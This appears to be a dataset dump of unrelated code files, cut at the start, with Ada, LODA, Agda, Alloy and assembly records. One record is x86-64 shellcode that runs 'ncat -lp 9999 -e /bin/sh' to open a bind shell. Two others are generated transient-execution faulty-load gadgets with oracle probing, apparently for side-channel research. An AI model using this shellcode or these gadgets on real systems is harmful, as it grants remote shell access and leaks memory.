P.Common.Wait_Count - 1; if P.Common.Wait_Count = 0 then Wakeup (P, Master_Completion_Sleep); end if; else pragma Debug (Debug.Trace (Self_ID, "Make_Passive: Phase 1, parent awake", 'M')); null; end if; Unlock (C); Unlock (P); end Make_Passive; end System.Tasking.Utilities;
other.7z/SFC.7z/SFC/ソースデータ/ゼルダの伝説神々のトライフォース/日本_Ver3/asm/zel_sut2.asm	prismotizm/gigaleak	0	1513	Name: zel_sut2.asm Type: file Size: 67030 Last-Modified: '2016-05-13T04:36:32Z' SHA-1: 8C192699ADEF5792559F437FD0000F5D925ACC5C Description: null
oeis/022/A022405.asm	neoneye/loda-programs	11	99586	<gh_stars>10-100 ; A022405: a(n) = a(n-1)*a(n-2) - a(n-3), with a(1) = 0, a(2) = 1, a(3) = 2. ; Submitted by <NAME> ; 0,1,2,2,3,4,10,37,366,13532,4952675,67019597734,331926286207224918,22245566178948766568816183137,7383888166355511098764350563784314022618210032,164258772862618181462691390833789348539465093269150451212405503507035405466,1212868409160364150700880809778324493557128541620205374456628316922939710724718689754314870081998500456550947921452651775 mov $2,-1 lpb $0 sub $0,1 mov $5,$1 add $1,2 sub $4,$2 sub $3,$4 mov $2,$3 mov $3,$5 sub $3,$2 sub $1,$3 mul $2,$5 lpe mov $0,$1
tools/scitools/conf/understand/ada/ada05/a-stzmap.ads	brucegua/moocos	1	2928	<gh_stars>1-10 ------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- A D A . S T R I N G S . W I D E _ W I D E _ M A P S -- -- -- -- S p e c -- -- -- -- Copyright (C) 1992-2006, Free Software Foundation, Inc. -- -- -- -- This specification is derived from the Ada Reference Manual for use with -- -- GNAT. The copyright notice above, and the license provisions that follow -- -- apply solely to the contents of the part following the private keyword. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 2, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -- -- for more details. You should have received a copy of the GNU General -- -- Public License distributed with GNAT; see file COPYING. If not, write -- -- to the Free Software Foundation, 51 Franklin Street, Fifth Floor, -- -- Boston, MA 02110-1301, USA. -- -- -- -- -- -- -- -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ with Ada.Finalization; package Ada.Strings.Wide_Wide_Maps is pragma Preelaborate; ------------------------------------------ -- Wide_Wide_Character Set Declarations -- ------------------------------------------ type Wide_Wide_Character_Set is private; pragma Preelaborable_Initialization (Wide_Wide_Character_Set); -- Representation for a set of Wide_Wide_Character values: Null_Set : constant Wide_Wide_Character_Set; ----------------------------------------------- -- Constructors for Wide_Wide_Character Sets -- ----------------------------------------------- type Wide_Wide_Character_Range is record Low : Wide_Wide_Character; High : Wide_Wide_Character; end record; -- Represents Wide_Wide_Character range Low .. High type Wide_Wide_Character_Ranges is array (Positive range <>) of Wide_Wide_Character_Range; function To_Set (Ranges : Wide_Wide_Character_Ranges) return Wide_Wide_Character_Set; function To_Set (Span : Wide_Wide_Character_Range) return Wide_Wide_Character_Set; function To_Ranges (Set : Wide_Wide_Character_Set) return Wide_Wide_Character_Ranges; --------------------------------------- -- Operations on Wide Character Sets -- --------------------------------------- function "=" (Left, Right : Wide_Wide_Character_Set) return Boolean; function "not" (Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "and" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "or" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "xor" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "-" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function Is_In (Element : Wide_Wide_Character; Set : Wide_Wide_Character_Set) return Boolean; function Is_Subset (Elements : Wide_Wide_Character_Set; Set : Wide_Wide_Character_Set) return Boolean; function "<=" (Left : Wide_Wide_Character_Set; Right : Wide_Wide_Character_Set) return Boolean renames Is_Subset; subtype Wide_Wide_Character_Sequence is Wide_Wide_String; -- Alternative representation for a set of character values function To_Set (Sequence : Wide_Wide_Character_Sequence) return Wide_Wide_Character_Set; function To_Set (Singleton : Wide_Wide_Character) return Wide_Wide_Character_Set; function To_Sequence (Set : Wide_Wide_Character_Set) return Wide_Wide_Character_Sequence; ---------------------------------------------- -- Wide_Wide_Character Mapping Declarations -- ---------------------------------------------- type Wide_Wide_Character_Mapping is private; pragma Preelaborable_Initialization (Wide_Wide_Character_Mapping); -- Representation for a wide character to wide character mapping: function Value (Map : Wide_Wide_Character_Mapping; Element : Wide_Wide_Character) return Wide_Wide_Character; Identity : constant Wide_Wide_Character_Mapping; -------------------------------------- -- Operations on Wide Wide Mappings -- --------------------------------------- function To_Mapping (From, To : Wide_Wide_Character_Sequence) return Wide_Wide_Character_Mapping; function To_Domain (Map : Wide_Wide_Character_Mapping) return Wide_Wide_Character_Sequence; function To_Range (Map : Wide_Wide_Character_Mapping) return Wide_Wide_Character_Sequence; type Wide_Wide_Character_Mapping_Function is access function (From : Wide_Wide_Character) return Wide_Wide_Character; private package AF renames Ada.Finalization; ----------------------------------------------- -- Representation of Wide_Wide_Character_Set -- ----------------------------------------------- -- A wide character set is represented as a sequence of wide character -- ranges (i.e. an object of type Wide_Wide_Character_Ranges) in which the -- following hold: -- The lower bound is 1 -- The ranges are in order by increasing Low values -- The ranges are non-overlapping and discontigous -- A character value is in the set if it is contained in one of the -- ranges. The actual Wide_Wide_Character_Set value is a controlled pointer -- to this Wide_Wide_Character_Ranges value. The use of a controlled type -- is necessary to prevent storage leaks. type Wide_Wide_Character_Ranges_Access is access all Wide_Wide_Character_Ranges; type Wide_Wide_Character_Set is new AF.Controlled with record Set : Wide_Wide_Character_Ranges_Access; end record; pragma Finalize_Storage_Only (Wide_Wide_Character_Set); -- This avoids useless finalizations, and, more importantly avoids -- incorrect attempts to finalize constants that are statically -- declared here and in Ada.Strings.Wide_Wide_Maps, which is incorrect. procedure Initialize (Object : in out Wide_Wide_Character_Set); procedure Adjust (Object : in out Wide_Wide_Character_Set); procedure Finalize (Object : in out Wide_Wide_Character_Set); Null_Range : aliased constant Wide_Wide_Character_Ranges := (1 .. 0 => (Low => ' ', High => ' ')); Null_Set : constant Wide_Wide_Character_Set := (AF.Controlled with Set => Null_Range'Unrestricted_Access); --------------------------------------------------- -- Representation of Wide_Wide_Character_Mapping -- --------------------------------------------------- -- A wide character mapping is represented as two strings of equal -- length, where any character appearing in Domain is mapped to the -- corresponding character in Rangev. A character not appearing in -- Domain is mapped to itself. The characters in Domain are sorted -- in ascending order. -- The actual Wide_Wide_Character_Mapping value is a controlled record -- that contains a pointer to a discriminated record containing the -- range and domain values. -- Note: this representation is canonical, and the values stored in -- Domain and Rangev are exactly the values that are returned by the -- functions To_Domain and To_Range. The use of a controlled type is -- necessary to prevent storage leaks. type Wide_Wide_Character_Mapping_Values (Length : Natural) is record Domain : Wide_Wide_Character_Sequence (1 .. Length); Rangev : Wide_Wide_Character_Sequence (1 .. Length); end record; type Wide_Wide_Character_Mapping_Values_Access is access all Wide_Wide_Character_Mapping_Values; type Wide_Wide_Character_Mapping is new AF.Controlled with record Map : Wide_Wide_Character_Mapping_Values_Access; end record; pragma Finalize_Storage_Only (Wide_Wide_Character_Mapping); -- This avoids useless finalizations, and, more importantly avoids -- incorrect attempts to finalize constants that are statically -- declared here and in Ada.Strings.Wide_Wide_Maps, which is incorrect. procedure Initialize (Object : in out Wide_Wide_Character_Mapping); procedure Adjust (Object : in out Wide_Wide_Character_Mapping); procedure Finalize (Object : in out Wide_Wide_Character_Mapping); Null_Map : aliased constant Wide_Wide_Character_Mapping_Values := (Length => 0, Domain => "", Rangev => ""); Identity : constant Wide_Wide_Character_Mapping := (AF.Controlled with Map => Null_Map'Unrestricted_Access); end Ada.Strings.Wide_Wide_Maps;
samples/ncat_bind.asm	0x00-0x00/shellcoding	0	18662	global _start: _start: xor rdi, rdi;zera o rdi xor rsi, rsi ;zera o rsi xor rax, rax ;zera o rax push rdi ; stack = 0 0 pop rdx ; rdx = 0 \| stack = NULL mov rax, 0x68732f4141414141 ; move hs/ no rax shr rax, 0x28 ;insere null byte no primeiro A push rax mov rax, 0x6e69622f20652d20 ;move nib/ -e rax push rax mov rax, 0x3939393920706c2d ;move 9999 pl- push rax push rsp ;puxa o endereco da string na stack pop rsi ;guarda o endereco do argumento no rsi mov rdi, 0x7461636e2f414141 ; move At no registro rdi shr rdi, 0x18 push rdi; move rdi no stack \| stack = 0xAAAAAAAt mov rdi, 0x6e69622f7273752f ; move acn/nib/ no registro rdi push rdi ; empurra endereco do rdi na stack \| stack = 0xAAAAAAAAt, 0xacn/nib/ push rsp ; puxa stack pointer pra stack pop rdi ; pega o ponteiro do stack pointer (o comeco da string) push 0x3b pop rax syscall
libsrc/_DEVELOPMENT/adt/p_forward_list_alt/c/sdcc_iy/p_forward_list_alt_remove_after.asm	jpoikela/z88dk	640	160229	<gh_stars>100-1000 ; void p_forward_list_alt_remove_after(p_forward_list_alt_t list, void *list_item) SECTION code_clib SECTION code_adt_p_forward_list_alt PUBLIC _p_forward_list_alt_remove_after EXTERN asm_p_forward_list_alt_remove_after _p_forward_list_alt_remove_after: pop af pop bc pop hl push hl push bc push af jp asm_p_forward_list_alt_remove_after
Transynther/x86/_processed/AVXALIGN/_zr_/i7-8650U_0xd2.log_1378_1186.asm	ljhsiun2/medusa	9	20776	.global s_prepare_buffers s_prepare_buffers: push %r10 push %r14 push %r15 push %r8 push %r9 push %rcx push %rdi lea addresses_A_ht+0x1678b, %r10 dec %r9 movb $0x61, (%r10) nop nop nop nop nop add %r14, %r14 lea addresses_normal_ht+0x140ab, %r15 nop dec %rdi mov (%r15), %r8w nop dec %rcx lea addresses_WC_ht+0xdeb, %r15 xor $48035, %r10 movw $0x6162, (%r15) nop nop nop nop cmp $24613, %r10 pop %rdi pop %rcx pop %r9 pop %r8 pop %r15 pop %r14 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r13 push %r15 push %rax push %rbx push %rcx push %rdi // Store lea addresses_A+0x1c536, %r13 clflush (%r13) nop nop nop nop xor $13052, %rbx mov $0x5152535455565758, %r15 movq %r15, %xmm0 vmovups %ymm0, (%r13) cmp $40494, %rax // Store lea addresses_normal+0x1f1eb, %r10 nop nop nop nop xor %r15, %r15 mov $0x5152535455565758, %rax movq %rax, %xmm0 vmovups %ymm0, (%r10) nop inc %r10 // Store lea addresses_WC+0x18cc3, %r10 nop nop cmp $15201, %rdi mov $0x5152535455565758, %r13 movq %r13, (%r10) nop nop nop nop add $46265, %rcx // Faulty Load lea addresses_US+0x4deb, %r10 nop nop nop nop nop cmp %r13, %r13 movntdqa (%r10), %xmm6 vpextrq $0, %xmm6, %rax lea oracles, %rcx and $0xff, %rax shlq $12, %rax mov (%rcx,%rax,1), %rax pop %rdi pop %rcx pop %rbx pop %rax pop %r15 pop %r13 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': True, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}} {'00': 1378} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
programs/oeis/086/A086483.asm	jmorken/loda	1	19113	<reponame>jmorken/loda<filename>programs/oeis/086/A086483.asm ; A086483: Bit that is two places to left of least significant bit in binary expansion of n. ; 0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,1,1,1,0,0,0,0,1,1,0,1,1,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,0,0,0,1,1,0,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,1 sub $0,1 mul $0,2 lpb $0 mov $2,$0 sub $0,$0 add $2,1 cal $2,99549 ; Odd part of n modulo 8. add $1,$2 lpe div $1,4
agda-stdlib/src/Data/Maybe.agda	DreamLinuxer/popl21-artifact	5	6522	------------------------------------------------------------------------ -- The Agda standard library -- -- The Maybe type ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Data.Maybe where open import Data.Empty using (⊥) open import Data.Unit using (⊤) open import Data.Bool.Base using (T) open import Data.Maybe.Relation.Unary.All open import Data.Maybe.Relation.Unary.Any open import Level using (Level) private variable a : Level A : Set a ------------------------------------------------------------------------ -- The base type and some operations open import Data.Maybe.Base public ------------------------------------------------------------------------ -- Using Any and All to define Is-just and Is-nothing Is-just : Maybe A → Set _ Is-just = Any (λ _ → ⊤) Is-nothing : Maybe A → Set _ Is-nothing = All (λ _ → ⊥) to-witness : ∀ {m : Maybe A} → Is-just m → A to-witness (just {x = p} _) = p to-witness-T : ∀ (m : Maybe A) → T (is-just m) → A to-witness-T (just p) _ = p
openal-context-error.ads	io7m/coreland-openal-ada	1	30771	<gh_stars>1-10 package OpenAL.Context.Error is type Error_t is (No_Error, Invalid_Device, Invalid_Context, Invalid_Enumeration, Invalid_Value, Out_Of_Memory, Unknown_Error); -- proc_map : alcGetError function Get_Error (Device : in Device_t) return Error_t; private function Map_Constant_To_Error (Error : in Types.Enumeration_t) return Error_t; end OpenAL.Context.Error;
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_1459.asm	ljhsiun2/medusa	9	247244	.global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r13 push %r14 push %r9 push %rax push %rbp // Store lea addresses_WC+0x3494, %r9 nop nop nop add %r10, %r10 mov $0x5152535455565758, %rbp movq %rbp, %xmm4 vmovups %ymm4, (%r9) nop nop nop nop and %rax, %rax // Faulty Load lea addresses_UC+0x9814, %r13 nop xor $22902, %r14 movb (%r13), %r11b lea oracles, %rbp and $0xff, %r11 shlq $12, %r11 mov (%rbp,%r11,1), %r11 pop %rbp pop %rax pop %r9 pop %r14 pop %r13 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_UC', 'same': False, 'size': 32, 'congruent': 0, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WC', 'same': False, 'size': 32, 'congruent': 5, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_UC', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'37': 21829} 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 */
iAlloy-dataset-master/mutant_version_set/sll/v1/sll.als	jringert/alloy-diff	1	2827	<gh_stars>1-10 module SinglyLinkedList //JOR//open util/integer [] as integer sig List { header: (lone Node) } sig Node { link: (lone Node) } pred Acyclic[l: List] { ((no (l.header)) \|\| (some n: (one ((l.header).(*link))) { (no (n.link)) })) } run Acyclic
examples/fib.asm	Benderx2/FVM	2	96	include 'a32.inc' _start: LOAD_R0 string CALLF print LOAD_R1 5 XOR R1, R1 VM_DEBUG LOAD_R0 15 LOAD_R1 25 ADDR R0, R1 VM_DEBUG LOAD_R0 R1 CMPR R0, R1 JMPF_E .equal ;; this line wont be printed LOAD_R0 not_equal_string CALLF print .equal: LOAD_R0 fib_test CALLF print CALLF do_fib_test VM_EXIT print: PUSH R0 PUSH R1 .ploop: LOAD_BYTE CMPR R1, 0 JMPF_E .done VM_CALL 0 JMPF .ploop .done: POP R1 POP R0 RETF do_fib_test: LOAD_R0 1 LOAD_R2 0 LOAD_R3 1 .ploop: ; R3 = 1 ; R0 = 1 ; R0 + R3 = R0 = 2 ; R3 = 1 ; R0 = 2 ; R3 = 1 ; R0 + R3 = R0 = 3 ; R3 = 2 ; ??? LOAD_R3 R4 LOAD_R4 R0 ADDR R0, R3 LOAD_R1 R0 VM_CALL 3 LOAD_R1 ' ' VM_CALL 0 INCR R2 CMPR R2, 12 JMPF_E .done JMPF .ploop .done: RETF _end_start: _data: string: db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 0 not_equal_string: db 'R0 and R1 aren"t equal FAIL', 0 fib_test: db 'Fibonacci Test....', 0x0A, 0 _end_data: _bss: _end_bss:
notes/FOT/FOTC/Data/Nat/Induction/AdditionalHypothesis/Instances/PropertiesATP.agda	asr/fotc	11	4256	<filename>notes/FOT/FOTC/Data/Nat/Induction/AdditionalHypothesis/Instances/PropertiesATP.agda ------------------------------------------------------------------------------ -- Arithmetic properties using instances of the induction principle ------------------------------------------------------------------------------ {-# OPTIONS --exact-split #-} {-# OPTIONS --no-sized-types #-} {-# OPTIONS --no-universe-polymorphism #-} {-# OPTIONS --without-K #-} module FOT.FOTC.Data.Nat.Induction.AdditionalHypothesis.Instances.PropertiesATP where open import FOTC.Base open import FOTC.Data.Nat hiding ( N-ind ) ------------------------------------------------------------------------------ -- Induction principle with the additional hypothesis. N-ind₁ : (A : D → Set) → A zero → (∀ {n} → N n → A n → A (succ₁ n)) → ∀ {n} → N n → A n N-ind₁ A A0 h nzero = A0 N-ind₁ A A0 h (nsucc Nn) = h Nn (N-ind₁ A A0 h Nn) -- From now on we will use the N-ind₁ induction principle. N-ind = N-ind₁ ------------------------------------------------------------------------------ -- Totality properties pred-N-ind-instance : N (pred₁ zero) → (∀ {n} → N n → N (pred₁ n) → N (pred₁ (succ₁ n))) → ∀ {n} → N n → N (pred₁ n) pred-N-ind-instance = N-ind₁ (λ i → N (pred₁ i)) postulate pred-N : ∀ {n} → N n → N (pred₁ n) {-# ATP prove pred-N pred-N-ind-instance #-} +-N-ind-instance : ∀ {n} → N (zero + n) → (∀ {m} → N m → N (m + n) → N (succ₁ m + n)) → ∀ {m} → N m → N (m + n) +-N-ind-instance {n} = N-ind (λ i → N (i + n)) postulate +-N : ∀ {m n} → N m → N n → N (m + n) {-# ATP prove +-N +-N-ind-instance #-} ∸-N-ind-instance : ∀ {m} → N (m ∸ zero) → (∀ {n} → N n → N (m ∸ n) → N (m ∸ succ₁ n)) → ∀ {n} → N n → N (m ∸ n) ∸-N-ind-instance {n} = N-ind (λ i → N (n ∸ i)) postulate ∸-N : ∀ {m n} → N m → N n → N (m ∸ n) {-# ATP prove ∸-N ∸-N-ind-instance pred-N #-} -N-ind-instance : ∀ {n} → N (zero n) → (∀ {m} → N m → N (m * n) → N (succ₁ m * n)) → ∀ {m} → N m → N (m * n) -N-ind-instance {n} = N-ind (λ i → N (i n)) postulate -N : ∀ {m n} → N m → N n → N (m n) {-# ATP prove -N -N-ind-instance +-N #-} +-rightIdentity-ind-instance : zero + zero ≡ zero → (∀ {n} → N n → n + zero ≡ n → succ₁ n + zero ≡ succ₁ n) → ∀ {n} → N n → n + zero ≡ n +-rightIdentity-ind-instance = N-ind (λ i → i + zero ≡ i) postulate +-rightIdentity : ∀ {n} → N n → n + zero ≡ n {-# ATP prove +-rightIdentity +-rightIdentity-ind-instance #-} +-assoc-ind-instance : ∀ {n} {o} → zero + n + o ≡ zero + (n + o) → (∀ {m} → N m → m + n + o ≡ m + (n + o) → succ₁ m + n + o ≡ succ₁ m + (n + o)) → ∀ {m} → N m → m + n + o ≡ m + (n + o) +-assoc-ind-instance {n} {o} = N-ind (λ i → i + n + o ≡ i + (n + o)) postulate +-assoc : ∀ {m} → N m → ∀ n o → m + n + o ≡ m + (n + o) {-# ATP prove +-assoc +-assoc-ind-instance #-} x+Sy≡S[x+y]-ind-instance : ∀ {n} → zero + succ₁ n ≡ succ₁ (zero + n) → (∀ {m} → N m → m + succ₁ n ≡ succ₁ (m + n) → succ₁ m + succ₁ n ≡ succ₁ (succ₁ m + n)) → ∀ {m} → N m → m + succ₁ n ≡ succ₁ (m + n) x+Sy≡S[x+y]-ind-instance {n} = N-ind (λ i → i + succ₁ n ≡ succ₁ (i + n)) postulate x+Sy≡S[x+y] : ∀ {m} → N m → ∀ n → m + succ₁ n ≡ succ₁ (m + n) {-# ATP prove x+Sy≡S[x+y] x+Sy≡S[x+y]-ind-instance #-} +-comm-ind-instance : ∀ {n} → zero + n ≡ n + zero → (∀ {m} → N m → m + n ≡ n + m → succ₁ m + n ≡ n + succ₁ m) → ∀ {m} → N m → m + n ≡ n + m +-comm-ind-instance {n} = N-ind (λ i → i + n ≡ n + i) postulate +-comm : ∀ {m n} → N m → N n → m + n ≡ n + m {-# ATP prove +-comm +-comm-ind-instance +-rightIdentity x+Sy≡S[x+y] #-}
